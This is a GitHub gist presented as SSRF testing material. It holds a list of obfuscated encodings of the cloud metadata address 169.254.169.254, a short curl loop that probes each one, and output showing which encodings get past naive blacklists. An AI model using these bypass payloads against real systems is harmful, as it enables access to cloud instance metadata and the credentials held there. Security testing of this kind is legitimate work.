Last active
September 15, 2022 18:29
-
-
Save coffeetocode/2dd9c302b28bc81c60690378c39241de to your computer and use it in GitHub Desktop.
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. Useful for SSRF testing, among other things. See https://twitter.com/coffeetocode/status/912788650408026112
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./try_local_metadata.sh | |
| Trying 169.254.169.254... found metadata | |
| Trying 169.254.43518... found metadata | |
| Trying 169.16689662... found metadata | |
| Trying 2852039166... found metadata | |
| Trying 0251.0376.0251.0376... found metadata | |
| Trying 0251.0376.0124776... found metadata | |
| Trying 251.0775248... - | |
| Trying 25177524776... - | |
| Trying 0xa9.0xfe.0xa9.0xfe... found metadata | |
| Trying 0xa9.0xfe.0xa9fe... found metadata | |
| Trying 0xa9.0xfea9fe... found metadata | |
| Trying 0xa9fea9fe... found metadata | |
| Trying metadata.coffeetocode.net... found metadata | |
| Trying 425.510.425.510... - | |
| Trying 7147006462... - | |
| Trying 0xA9.0xFE.0xA9.0xFE... found metadata | |
| Trying 0xA9FEA9FE... found metadata | |
| Trying 0x41414141A9FEA9FE... - | |
| Trying 0251.0376.0251.0376... found metadata | |
| Trying 0251.00376.000251.0000376... found metadata | |
| Trying [::1698.254.169.254]... - | |
| Trying instance-data... - | |
| Trying metadata.google.internal... - | |
| Trying metadata... - | |
| Trying fd00:ec2::254... - | |
| Trying [::ffff:a9fe:a9fe]... found metadata | |
| Trying [::ffff:169.254.169.254]... found metadata | |
| Trying [0:0:0:0:0:ffff:169.254.169.254]... found metadata | |
| Trying ::ffff:a9fe:a9fe... - | |
| Trying ::ffff:169.254.169.254... - | |
| Trying 0:0:0:0:0:ffff:169.254.169.254... - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 169.254.169.254 | |
| 169.254.43518 | |
| 169.16689662 | |
| 2852039166 | |
| 0251.0376.0251.0376 | |
| 0251.0376.0124776 | |
| 251.0775248 | |
| 25177524776 | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0xa9.0xfe.0xa9fe | |
| 0xa9.0xfea9fe | |
| 0xa9fea9fe | |
| metadata.coffeetocode.net | |
| 425.510.425.510 | |
| 7147006462 | |
| 0xA9.0xFE.0xA9.0xFE | |
| 0xA9FEA9FE | |
| 0x41414141A9FEA9FE | |
| 0251.0376.0251.0376 | |
| 0251.00376.000251.0000376 | |
| [::1698.254.169.254] | |
| instance-data | |
| metadata.google.internal | |
| metadata | |
| fd00:ec2::254 | |
| [::ffff:a9fe:a9fe] | |
| [::ffff:169.254.169.254] | |
| [0:0:0:0:0:ffff:169.254.169.254] | |
| ::ffff:a9fe:a9fe | |
| ::ffff:169.254.169.254 | |
| 0:0:0:0:0:ffff:169.254.169.254 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # run on an instance of course... | |
| # add metadata flavor headers as necessary: https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb | |
| while read p; do | |
| printf "Trying %-30s " $p... | |
| if curl -s "http://$p/" | grep --silent latest; then | |
| echo found metadata; | |
| else | |
| echo -; | |
| fi | |
| done <local_metadata_synonyms.txt |
Added some IPv6 synonyms and google-specific hostnames
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Fixed missing digit in 169.16689662 and confirmed that works as expected now.